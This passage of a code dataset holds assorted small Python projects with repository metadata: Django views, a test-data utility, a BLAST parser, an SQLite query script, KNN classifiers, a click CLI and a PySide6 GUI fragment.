"usage_type": "call"}]} +{"seq_id": "43211489851", "text": "from django.shortcuts import render, redirect\nfrom .form import AddTaskForm, Task, ReportForm\nfrom django.contrib.auth.models import User,Group\n\n# Create your views here.\n\n\ndef add_task(request):\n form = AddTaskForm(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n form = AddTaskForm()\n else:\n form = AddTaskForm()\n return render(request, 'AddTaskForm.html', {'form': form})\n\n\ndef Reports(request):\n form = ReportForm(request.POST)\n if request.method == 'POST':\n form.save()\n form = ReportForm()\n else:\n form = ReportForm()\n return render(request, 'Reports.html', {'form':form})\n\n\n\ndef showTaskExecutor(request):\n username = None\n if request.user.is_authenticated:\n username = request.user.username\n if request.user.is_authenticated:\n Tasks = Task.objects.filter(TaskExecutor = request.user)\n elif username == 'admin':\n Tasks = Task.objects.all()\n return render(request, 'TaskList.html', {'Tasks': Tasks})\n", "repo_name": "airdar/HelpDeck", "sub_path": "views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "form.AddTaskForm", "line_number": 9, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 11, "usage_type": "call"}, {"api_name": "form.save", "line_number": 12, "usage_type": "call"}, {"api_name": "form.AddTaskForm", "line_number": 13, "usage_type": "call"}, {"api_name": "form.AddTaskForm", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "form.ReportForm", "line_number": 20, "usage_type": "call"}, {"api_name": "form.save", "line_number": 22, "usage_type": "call"}, {"api_name": "form.ReportForm", "line_number": 23, "usage_type": "call"}, {"api_name": "form.ReportForm", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "form.Task.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "form.Task.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "form.Task", "line_number": 35, "usage_type": "name"}, {"api_name": "form.Task.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "form.Task.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "form.Task", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "44978644888", "text": "# -*- coding: utf-8 -*-\n# @Time : 2021/8/11 15:27\n# @Author : Limusen\n# @File : demo_test_data_utils\n\n\nimport os\nfrom common.config_utils import local_config\nfrom common.excel_utils import ExcelUtils\n\ncurrent = os.path.dirname(__file__)\ndir_path = os.path.join(current, '..',local_config.test_datas_path)\n\n\nclass TestDataUtils:\n\n def __init__(self, test_suite_name, test_class_name):\n self.test_class_name = test_class_name\n self.excel_data = ExcelUtils(test_suite_name, dir_path).get_sheet_data_by_list()\n self.test_suite_counts = len(self.excel_data) - 1\n self.excel_rows = len(self.excel_data)\n\n def convert_excel_data_test_data(self):\n test_data_information = {}\n for row in range(1, self.excel_rows): # 循环总行数\n test_data_info = {} # 数据分层\n if self.excel_data[row][2].__eq__(self.test_class_name): # 判断传入的测试类是否与excel中数据一致\n test_data_info[\"test_name\"] = self.excel_data[row][1] # 取出测试名称\n test_data_info[\"is_not\"] = self.excel_data[row][3] # 取出是否执行\n test_data_info[\"excepted_result\"] = self.excel_data[row][4] # 取出期望结果\n test_parameter = {} # 测试数据需要用字典来读取\n for case_data in range(5, len(self.excel_data[row])): # 从第六个参数开始进行判断 因为测试数据可能有多个\n if self.excel_data[row][case_data].__contains__(\"=\") and len(\n self.excel_data[row][case_data]) > 2: # 分割测试数据并判断长度是否大于两个\n parameter_info = self.excel_data[row][case_data].split(\"=\")\n test_parameter[parameter_info[0]] = parameter_info[1]\n test_data_info['test_parameter'] = test_parameter\n test_data_information[self.excel_data[row][0]] = test_data_info\n return test_data_information\n\n\nif __name__ == \"__main__\":\n infos = TestDataUtils(\"login_suite\", \"LoginTest\").convert_excel_data_test_data()\n\n for i in infos.values():\n print(i)\n", "repo_name": "liousAlready/Pageui_Test", "sub_path": "sample/demo_test_data_utils.py", "file_name": "demo_test_data_utils.py", "file_ext": "py", "file_size_in_byte": 2155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "common.config_utils.local_config.test_datas_path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "common.config_utils.local_config", "line_number": 12, "usage_type": "name"}, {"api_name": "common.excel_utils.ExcelUtils", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "5901865047", "text": "#!/usr/bin/env python3\n\nfrom Bio import SearchIO\nfrom pprint import pprint\nimport pandas as pd\nimport sys\nimport math\n\n\ndef parse_fai(fai):\n \"\"\"\n see https://samtools.github.io/hts-specs/tabix.pdf\n \"\"\"\n df = pd.read_csv(\n fai,\n sep=\"\\t\",\n header=None,\n names=[\"gene_name\", \"gene_len\", \"gene_beg\", \"gene_end\", \"total_bytes\"],\n )\n ave = sum(df[\"gene_len\"]) / len(df)\n df[\"ratio\"] = df[\"gene_len\"] / ave\n df[\"bgc\"] = df.apply(lambda x: x[\"gene_name\"].split(\"|\")[0], axis=1)\n return df.set_index(\"gene_name\").loc[:, [\"bgc\", \"gene_len\", \"ratio\"]]\n\n\ndef weight(evalue):\n return math.exp(-evalue)\n\n\n# BLAST tab format\n# qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore\n# qseqid sseqid pident length evalue\n\nBGC_GENE = parse_fai(sys.argv[1])\ni = 0\nblast_df = pd.DataFrame(\n columns=[\"read_id\", \"gene_name\", \"ident_pct\", \"aln_span\", \"evalue\"]\n)\nepsilon_dict = {}\n\nfor qr in SearchIO.parse(sys.stdin, format=\"blast-tab\"):\n # print(\"Search %s has %i hits\" % (qr.id, len(qr)))\n i += 1\n epsilon_dict[qr.id] = 1e-20\n evalue_weight_sum = 0\n for hit in qr.hits:\n for hsp in hit.hsps:\n # print(\"%s %s %s %s %s %s\" % (qr.id, hit.id, hsp.ident_pct, hsp.evalue, hsp.aln_span, cur))\n evalue_weight = weight(hsp.evalue)\n evalue_weight_sum += evalue_weight\n blast_df = blast_df.append(\n {\n \"read_id\": qr.id,\n \"gene_name\": hit.id,\n \"ident_pct\": hsp.ident_pct,\n \"aln_span\": hsp.aln_span,\n \"evalue\": hsp.evalue,\n \"evalue_weight\": evalue_weight,\n },\n ignore_index=True,\n )\n epsilon_dict[qr.id] = max(epsilon_dict[qr.id], evalue_weight_sum)\n if i > 4:\n break\n\n# blast_df = pd.merge(blast_df, BGC_GENE.reset_index(), on=\"gene_name\")\n# pprint(blast_df)\n# print(\"\\n\")\n# pprint(epsilon_dict)\n# print(\"\\n\")\n# sum_df = blast_df.groupby(\"read_id\")[\"evalue_weight\"].agg(max=max)\n# pprint(sum_df)\n# print(sum_df.loc[\"CL100103977L2C001R001_2429/2\", \"max\"])\n\nblast_df[\"gene_abun\"] = blast_df.apply(\n lambda x: x[\"evalue_weight\"]\n / BGC_GENE.loc[x[\"gene_name\"], \"ratio\"]\n / epsilon_dict[x[\"read_id\"]],\n axis=1\n)\npprint(blast_df)\n", "repo_name": "alienzj/bgctk", "sub_path": "blast_parse.py", "file_name": "blast_parse.py", "file_ext": "py", "file_size_in_byte": 2345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "Bio.SearchIO.parse", "line_number": 41, "usage_type": "call"}, {"api_name": "Bio.SearchIO", "line_number": 41, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pprint.pprint", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "2459730172", "text": "import sqlite3\nfrom sqlite3 import Error\n\n# Función para abrir una conexión a la base de datos SQLite\ndef abrir_conexion():\n conexion = None\n try:\n conexion = sqlite3.connect(\"ip.db\")\n print(\"Conexión a la base de datos SQLite exitosa.\")\n except Error as e:\n print(\"Error al abrir la base de datos:\", e)\n return conexion\n\n\ndef mostrar_contenido(conexion, consulta):\n try:\n cursor = conexion.cursor()\n cursor.execute(consulta)\n filas = cursor.fetchall()\n for fila in filas:\n print(fila)\n except Error as e:\n print(\"Error al ejecutar la consulta:\", e)\n\n\nconexion = abrir_conexion()\nif conexion is not None:\n consulta = \"SELECT * FROM ips\" # Reemplaza \"acc\" con el nombre de tu tabla\n mostrar_contenido(conexion, consulta)\n conexion.close()\n", "repo_name": "axelxsx07/Ips", "sub_path": "sql.py", "file_name": "sql.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sqlite3.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 10, "usage_type": "name"}, {"api_name": "sqlite3.Error", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "30768001723", "text": "from django.contrib.auth import authenticate, login, get_user_model\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\n\nfrom .forms import ContactForm, LoginForm, RegisterForm\n\ndef home_page(request):\n # print(request.session.get(\"first_name\", \"Unknown\"))\n # request.session['first_name']\n context = {\n \"title\":\"Hello World!!\",\n \"content\":\"Welcome to the home page!\"\n }\n if request.user.is_authenticated():\n context[\"premium_content\"]=\"Now that you are logged in, you have full access. Enjoy!\"\n return render(request, \"home_page.html\", context)\n\ndef about_page(request):\n context = {\n \"title\":\"Hello World!!\",\n \"content\":\"Welcome to the about page!\"\n }\n return render(request, \"home_page.html\", context)\n\ndef contact_page(request):\n contact_form = ContactForm(request.POST or None)\n context = {\n \"title\":\"Hello World!!\",\n \"content\":\"Welcome to the contact page!\",\n \"form\": contact_form\n }\n if contact_form.is_valid():\n print(contact_form.cleaned_data)\n if request.method == 'POST':\n # print(request.POST)\n print(request.POST.get('fullname'))\n print(request.POST.get('email'))\n print(request.POST.get('content'))\n\n return render(request, \"contact/view.html\", context)\n\ndef login_page(request):\n form = LoginForm(request.POST or None)\n context = {\n \"form\": form\n }\n print(\"User logged in\")\n print(request.user.is_authenticated())\n if form.is_valid():\n print(form.cleaned_data)\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n user = authenticate(request, username=username, password=password)\n print(request.user.is_authenticated())\n\n if user is not None:\n print(request.user.is_authenticated())\n login(request, user)\n # redirect to success page\n # context['form'] = LoginForm()\n return redirect(\"/login\")\n else:\n # return an 'invalid login' error message\n print(\"error :(\")\n \n return render(request, \"auth/login.html\", context)\n\nUser = get_user_model()\ndef register_page(request):\n form = RegisterForm(request.POST or None)\n context = {\n \"form\": form\n }\n if form.is_valid():\n print(form.cleaned_data)\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n email = form.cleaned_data.get(\"email\")\n new_user = User.objects.create_user(username, email, password)\n print(new_user)\n return render(request, \"auth/register.html\", context)\n\n\ndef home_page_old(request):\n html_ = \"\"\"\n <!doctype html>\n <html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->\n <title>Bootstrap 101 Template\n\n \n \n\n \n \n \n \n \n

Hello, world!

\n\n \n \n \n \n \n \n \"\"\"\n return HttpResponse(html_)", "repo_name": "devinaanderson/django-ecommerce", "sub_path": "ecommerce/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 68, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "17954445013", "text": "import os\nimport struct\nimport torchvision\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import DataFrame, Series\nfrom sklearn.neighbors import KNeighborsClassifier # K-NN\n\n\ndef Iris():\n # 创建数据\n import sklearn.datasets as datasets\n\n iris = datasets.load_iris() # 数据:蓝蝴蝶\n X = iris['data']\n Y = iris['target']\n\n # 训练集和测试集\n from sklearn.model_selection import train_test_split\n\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1, random_state=0, shuffle=True)\n\n # 实例化\n Knn = KNeighborsClassifier(n_neighbors=10)\n Knn.fit(X_train, Y_train)\n print('数据组结果:')\n print('Score: ', Knn.score(X_train, Y_train))\n\n y_pred = Knn.predict(X_test)\n print('Target: ', Y_test)\n print('Result: ', y_pred)\n\n\ndef load_mnist(path, kind):\n \"\"\"Load MNIST data from `path`\"\"\"\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte'\n % kind)\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII',\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\n\ndef MyMnist():\n X_train, Y_train = load_mnist('./datasets/MNIST/raw', kind='train')\n X_test, Y_test = load_mnist('./datasets/MNIST/raw', kind='t10k')\n X_train, Y_train, X_test, Y_test = X_train[:10000, :], Y_train[:10000], X_test[:30, :], Y_test[:30]\n # print(X_train.shape)\n print('MNIST数据组结果:')\n knn = KNeighborsClassifier(n_neighbors=3)\n knn.fit(X_train, Y_train)\n print('Score: ', knn.score(X_train, Y_train))\n\n y_pred = knn.predict(X_test)\n print('Target: ', Y_test)\n print('Result: ', y_pred)\n\n '''可视化看一下数据'''\n # fig, ax = plt.subplots(\n # nrows=2,\n # ncols=5,\n # sharex=True,\n # sharey=True, )\n #\n # ax = ax.flatten()\n # for i in range(10):\n # img = X_train[Y_train == i][0].reshape(28, 28)\n # ax[i].imshow(img, cmap='Greys', interpolation='nearest')\n #\n # ax[0].set_xticks([])\n # ax[0].set_yticks([])\n # plt.tight_layout()\n # plt.show()\n\n\nif __name__ == '__main__':\n Iris()\n MyMnist()\n", "repo_name": "Arvin117/100-Day-ML", "sub_path": "D7_KNN.py", "file_name": "D7_KNN.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 15, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "21580366065", "text": "#/usr/bin/env python3\nfrom pathlib import Path\n\nimport click\n\nfrom .io import load_all\nfrom .run import run_context\n\nINDENT = ' '\n@click.group(invoke_without_command=True)\n@click.option('--cucucdir', default='./confs/')\n@click.pass_context\ndef cli(ctx, cucucdir):\n ctx.obj = cucucdir\n\n if ctx.invoked_subcommand is None:\n ctx.invoke(show)\n\n@cli.command()\n@click.argument('group', default=None, required=False)\n@click.pass_obj\ndef show(cucucdir, group):\n _, groups, _ = load_all(cucucdir)\n\n if group:\n groups = {k: v for k, v in groups.items() if k == group}\n if not groups:\n raise click.BadParameter('A group with the name \"{}\" does not exist'.format(group))\n\n for group in groups.values():\n click.secho('Group ', nl=False)\n click.secho(group.name, nl=False, bold=True)\n click.secho(':')\n \n for context in group.contexts.values():\n click.secho(INDENT, nl=False)\n click.secho('Context ', nl=False)\n click.secho(context.name, nl=False, bold=True)\n click.secho(': ', nl=False)\n click.secho(run_context(context, 'get'))\n\n@cli.command()\n@click.pass_obj\n@click.argument('vs_name')\ndef set(cucucdir, vs_name):\n vs_dir = Path(cucucdir, 'valuesets')\n _, groups, vss = load_all(cucucdir)\n click.secho('Switching to ', nl=False)\n click.secho(vs_name, bold=True)\n\n if vs_name in vss:\n vs = vss[vs_name]\n group = vs.group\n for ctx_name, value in vs.values.items():\n click.secho('Setting context {} to \"{}\"'.format(ctx_name, value))\n ctx = group.contexts[ctx_name]\n run_context(ctx, 'set', value)\n else:\n valuesets = ', '.join(['\"{}\"'.format(vs) for vs in vss.keys()])\n raise click.BadParameter('Unknown Valueset \"{}\", the following are available: {}'.format(vs_name, valuesets))\n\n@cli.command()\n@click.pass_obj\n@click.argument('what', required=False, default=None)\ndef list(cucucdir, what):\n contexts, groups, valuesets = load_all(cucucdir)\n \n if what == 'contexts' or what is None:\n for context in contexts.values():\n click.secho('Context ', nl=False)\n click.secho(context.name, bold=True, nl=False)\n click.secho(' getting with ', nl=False)\n click.secho(context.get, fg='yellow', nl=False)\n click.secho(' and setting with ', nl=False),\n click.secho(context.set, fg='yellow')\n if context.parser:\n click.secho(' (parsing results with \"{}\")'.format(context.parser))\n if what == 'groups' or what is None:\n for group in groups.values():\n click.secho('Group ', nl=False)\n click.secho(group.name, bold=True, nl=False)\n click.secho(' consisting of contexts ', nl=False)\n click.secho(', '.join(group.contexts), bold=True)\n if what == 'valuesets' or what is None:\n for valueset in valuesets.values():\n click.secho('Valueset ', nl=False)\n click.secho(valueset.name, bold=True, nl=False)\n click.secho(' for group ', nl=False)\n click.secho(valueset.group.name, bold=True, nl=False)\n click.secho(' with values ')\n for ctx, val in valueset.values.items():\n click.secho('\\t', nl=False)\n click.secho('{} = {}'.format(ctx, val))\n", "repo_name": "wonderb0lt/cucuc", "sub_path": "cucuc/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3115, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "click.group", "line_number": 10, "usage_type": "call"}, {"api_name": "click.option", "line_number": 11, "usage_type": "call"}, {"api_name": "click.pass_context", "line_number": 12, "usage_type": "attribute"}, {"api_name": "io.load_all", "line_number": 23, "usage_type": "call"}, {"api_name": "click.BadParameter", "line_number": 28, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 31, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 32, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 33, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 36, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 37, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 38, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 39, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 40, "usage_type": "call"}, {"api_name": "run.run_context", "line_number": 40, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 20, "usage_type": "call"}, {"api_name": "click.pass_obj", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "call"}, {"api_name": "io.load_all", "line_number": 47, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 48, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 49, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 55, "usage_type": "call"}, {"api_name": "run.run_context", "line_number": 57, "usage_type": "call"}, {"api_name": "click.BadParameter", "line_number": 60, "usage_type": "call"}, {"api_name": "click.pass_obj", "line_number": 43, "usage_type": "attribute"}, {"api_name": "click.argument", "line_number": 44, "usage_type": "call"}, {"api_name": "io.load_all", "line_number": 66, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 70, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 71, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 72, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 73, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 74, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 75, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 77, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 80, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 81, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 82, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 83, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 86, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 87, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 88, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 89, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 90, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 92, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 93, "usage_type": "call"}, {"api_name": "click.pass_obj", "line_number": 63, "usage_type": "attribute"}, {"api_name": "click.argument", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "2299581077", "text": "import ctypes\r\nimport sys\r\nimport utilitarios\r\nimport gc\r\nimport graphictools\r\nimport os\r\nimport data_management\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport xlsxwriter\r\nimport json\r\n\r\nfrom PySide6.QtWidgets import (QTreeWidgetItem, QGridLayout, QApplication,\r\nQFileDialog, QMainWindow, QTreeWidget, QHBoxLayout, QWidget, QPushButton,\r\nQLabel, QDateEdit, QVBoxLayout, QComboBox, QLineEdit, QSpinBox, QWidget,\r\nQTabWidget, QGroupBox, QTableWidget, QTableWidgetItem, QColorDialog,\r\nQCheckBox, QHeaderView, QDialog, QMessageBox, QDoubleSpinBox, QFrame, \r\nQStyle, QTabBar, QStylePainter, QProxyStyle, QStyleOptionTab)\r\nfrom PySide6.QtCore import QDate, Qt, QRect, QPoint\r\nfrom PySide6.QtGui import QColor, QIcon, QAction, QFontDatabase\r\n\r\nclass QHLine(QFrame):\r\n '''\r\n Classe responsável por desenhar uma linha horizontal (Widget)\r\n '''\r\n def __init__(self):\r\n super(QHLine, self).__init__()\r\n self.setFrameShape(QFrame.HLine)\r\n self.setFrameShadow(QFrame.Sunken)\r\n\r\nclass Tabela(QTreeWidget):\r\n '''\r\n Classe responsável pela operação da tabela do gerenciamento de estações\r\n de monitoramento.\r\n '''\r\n\r\n def __init__(self, parent = None):\r\n super().__init__()\r\n self.setHeaderLabels([\"Estações de monitoramento\"])\r\n self.header().setSectionResizeMode(QHeaderView.ResizeToContents)\r\n self.header().resizeSections()\r\n self.parentWidget = parent\r\n self.setColumnCount(1)\r\n self.itemChanged.connect(self.update_selection)\r\n self.items = []\r\n\r\n def update(self):\r\n # Atualiza a tabela sempre que um item é excluido ou adicionado\r\n self.clear()\r\n items = []\r\n for i in range(len(self.parentWidget.arquivos)):\r\n entity = self.parentWidget.arquivos[i]\r\n ini = entity.ini.item().strftime(\"%d/%m/%Y\")\r\n fim = entity.fim.item().strftime(\"%d/%m/%Y\")\r\n parent = QTreeWidgetItem(self)\r\n text = f'{entity.tipo} - {entity.nome:40} {ini:10} a {fim:10}'\r\n parent.setText(0, text)\r\n for j in range(len(entity.vars)):\r\n child = QTreeWidgetItem(parent)\r\n child.setFlags(child.flags() | Qt.ItemIsUserCheckable)\r\n child.setText(0, entity.vars[j])\r\n child.setData(1, 0, i)\r\n child.setData(2, 0, j)\r\n check_state = Qt.Checked if entity.vars_selected[j] else Qt.Unchecked\r\n child.setCheckState(0, check_state)\r\n\r\n items.append(parent)\r\n self.items = items\r\n\r\n def update_selection(self, item, column):\r\n\r\n # verifica se a coluna acionada é a zero\r\n if column == 0: \r\n entity_idx = item.data(1, 0)\r\n var_idx = item.data(2, 0)\r\n\r\n # verifica se os indices sao objetos None\r\n if entity_idx is None or var_idx is None:\r\n return None\r\n\r\n # continua o procedimento\r\n state = 0\r\n if item.checkState(column) == Qt.Checked:\r\n state = 1\r\n\r\n self.parentWidget.arquivos[entity_idx].vars_selected[var_idx] = state\r\n\r\n return None\r\n\r\n\r\nclass TabelaEixos(QTreeWidget):\r\n '''\r\n Classe responsável pela tabela relacionada a formatação dos eixos\r\n horizontal e vertical, na aba \"Gráfico\".\r\n '''\r\n\r\n def __init__(self, parentWidget = None):\r\n super().__init__()\r\n self.parentWidget = parentWidget\r\n self.setColumnCount(2)\r\n self.setHeaderLabels([\"Propriedades\", \"Valor\"])\r\n self.header().setSectionResizeMode(QHeaderView.Stretch)\r\n self.header().resizeSections()\r\n\r\n # variaveis\r\n self.items_timeseries = {\r\n \"Eixo Horizontal\" : [\r\n \"Intervalo\",\r\n \"Unidade\",\r\n \"Rotação (°)\",\r\n \"Tamanho da fonte\"],\r\n \"Eixo Vertical\" : [\"Número de rótulos\", \"Valor máximo\",\r\n \"Valor mínimo\", \"Tamanho da fonte\"]\r\n }\r\n self.items_scatterplot = {\r\n 'Eixo Horizontal' : [\r\n 'Número de rótulos',\r\n 'Valor máximo',\r\n 'Valor mínimo',\r\n \"Tamanho da fonte\"\r\n ],\r\n 'Eixo Vertical' : [\r\n 'Número de Rótulos',\r\n 'Valor Máximo',\r\n 'Valor Mínimo',\r\n \"Tamanho da fonte\",\r\n ]\r\n }\r\n self.active_scatter = 0\r\n\r\n # Widgets\r\n self.intervalo = QSpinBox()\r\n self.unidade = QComboBox()\r\n self.rotation_x = QSpinBox()\r\n self.size_y = QSpinBox()\r\n self.fontsize_x = QSpinBox()\r\n self.fontsize_y = QSpinBox()\r\n self.max_y = QDoubleSpinBox()\r\n self.min_y = QDoubleSpinBox()\r\n self.size_x = QSpinBox()\r\n self.max_x = QDoubleSpinBox()\r\n self.min_x = QDoubleSpinBox()\r\n \r\n # widgets list\r\n self.widgets = [\r\n {\r\n 'Eixo Horizontal': [self.intervalo, self.unidade,\r\n self.rotation_x, self.fontsize_x],\r\n 'Eixo Vertical' : [self.size_y, self.max_y,\r\n self.min_y, self.fontsize_y]\r\n },\r\n {\r\n 'Eixo Horizontal': [self.size_x, self.max_x,\r\n self.min_x, self.fontsize_x],\r\n 'Eixo Vertical' : [self.size_y, self.max_y,\r\n self.min_y, self.fontsize_y] \r\n }\r\n ]\r\n\r\n # configurando widgets\r\n self.intervalo.setRange(1, 30)\r\n self.unidade.addItems(['Dia', 'Mês', 'Ano'])\r\n self.unidade.setCurrentIndex(1)\r\n self.size_x.setMinimum(1)\r\n self.size_y.setMinimum(2)\r\n self.max_y.setRange(-100000, 100000)\r\n self.min_y.setRange(-100000, 100000)\r\n self.fontsize_x.setRange(1, 30)\r\n self.fontsize_y.setRange(1, 30)\r\n self.rotation_x.setRange(0, 180)\r\n mplcanvas = self.parentWidget.canvas\r\n self.size_x.setMaximum(mplcanvas.xticks.shape[0])\r\n self.size_x.setValue(int(mplcanvas.xtick_size))\r\n self.size_y.setValue(int(mplcanvas.ytick_size))\r\n self.max_y.setValue(float(mplcanvas.ytick_max))\r\n self.min_y.setValue(float(mplcanvas.ytick_min))\r\n self.max_x.setValue(float(mplcanvas.xtick_max))\r\n self.min_x.setValue(float(mplcanvas.xtick_min))\r\n self.fontsize_x.setValue(int(mplcanvas.xticks_fontsize))\r\n self.fontsize_y.setValue(int(mplcanvas.yticks_fontsize))\r\n \r\n # procedimentos\r\n self.run()\r\n \r\n # Signals and Slots\r\n self.size_x.textChanged.connect(self.changeHorizontalContents)\r\n self.fontsize_x.valueChanged.connect(self.changeHorizontalContents)\r\n self.fontsize_y.valueChanged.connect(self.changeVerticalContents)\r\n self.size_y.textChanged.connect(self.changeVerticalContents)\r\n self.max_y.editingFinished.connect(self.changeVerticalContents)\r\n self.min_y.editingFinished.connect(self.changeVerticalContents)\r\n self.rotation_x.textChanged.connect(self.changeHorizontalContents)\r\n self.intervalo.textChanged.connect(self.changeHorizontalContents)\r\n 